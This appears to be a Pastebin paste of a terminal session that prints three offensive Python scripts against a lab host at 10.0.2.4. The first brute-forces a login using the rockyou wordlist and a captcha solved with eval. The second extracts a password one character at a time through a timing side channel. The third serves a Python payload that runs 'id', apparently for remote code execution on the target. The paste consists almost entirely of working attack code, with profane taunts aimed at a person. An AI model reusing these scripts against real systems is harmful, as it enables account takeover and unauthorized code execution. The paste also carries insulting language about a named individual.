Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $ ls *.py
- evil.py loginpage.py timing.py
- clin_is_awesome@clin-is-awesome:~$ cat loginpage.py
- import requests
- import json
- def checkint(s):
- try:
- int(s)
- return True
- except ValueError:
- return False
- s = requests.Session()
- capcha = 'fuckcolin'
- password = 'colinisadick'
- success = False
- with open('/home/clin_is_awesome/rockyou.txt', 'r') as fin:
- for line in fin:
- payload = {'capcha': capcha, 'password':password}
- response = s.post('http://10.0.2.4/ajax_login_capcha', data=payload)
- j = response.json()
- #print("password:" + password)
- #print(j)
- if j['success'] == True:
- break
- v1 = j['value1']
- v2 = j['value2']
- op = j['operator']
- if checkint(v1) and checkint(v2):
- expr = (v1 + op + v2)
- capcha = eval(expr)
- password = line.strip()
- print ('I win and clin can get fucked')
- print ('password: ' + password)
- print (j)
- clin_is_awesome@clin-is-awesome:~$ cat timing.py
- import socket
- import sys
- import time
- #print >>sys.stderr, 'connecting to %s port %s' % server_address
- def makeGuess(guess):
- #print('guessing: ' + guess)
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- addr = ('10.0.2.4', 19391)
- result = False
- sock.connect(addr)
- try:
- response = sock.recv(1024).decode()
- t1 = time.time()
- sock.sendall(guess.encode())
- response = sock.recv(1024).decode()
- t2 = time.time()
- if t2 - t1 > 0.1:
- print ('successfull guess: ' + guess)
- result = True
- finally:
- sock.close()
- if 'Invalid Password' not in response:
- print response
- return result
- pw = ''
- chars = 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'
- clinsucks = False
- found = False
- while clinsucks == False:
- for char in chars:
- test = pw + char
- if makeGuess(test) == True:
- pw = test
- found = True
- if found == False:
- print('didn\'t find squat. Giving up')
- break
- clin_is_awesome@clin-is-awesome:~$ cat evil.py
- import cherrypy
- import os
- import subprocess
- class HelloWorld(object):
- @cherrypy.expose
- def status_py(self):
- return "import subprocess; foo = subprocess.check_output(['id'], stderr=subprocess.STDOUT); print(foo)"
- cherrypy.config.update({'server.socket_port': 34321 })
- cherrypy.engine.restart()
- cherrypy.quickstart(HelloWorld())
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement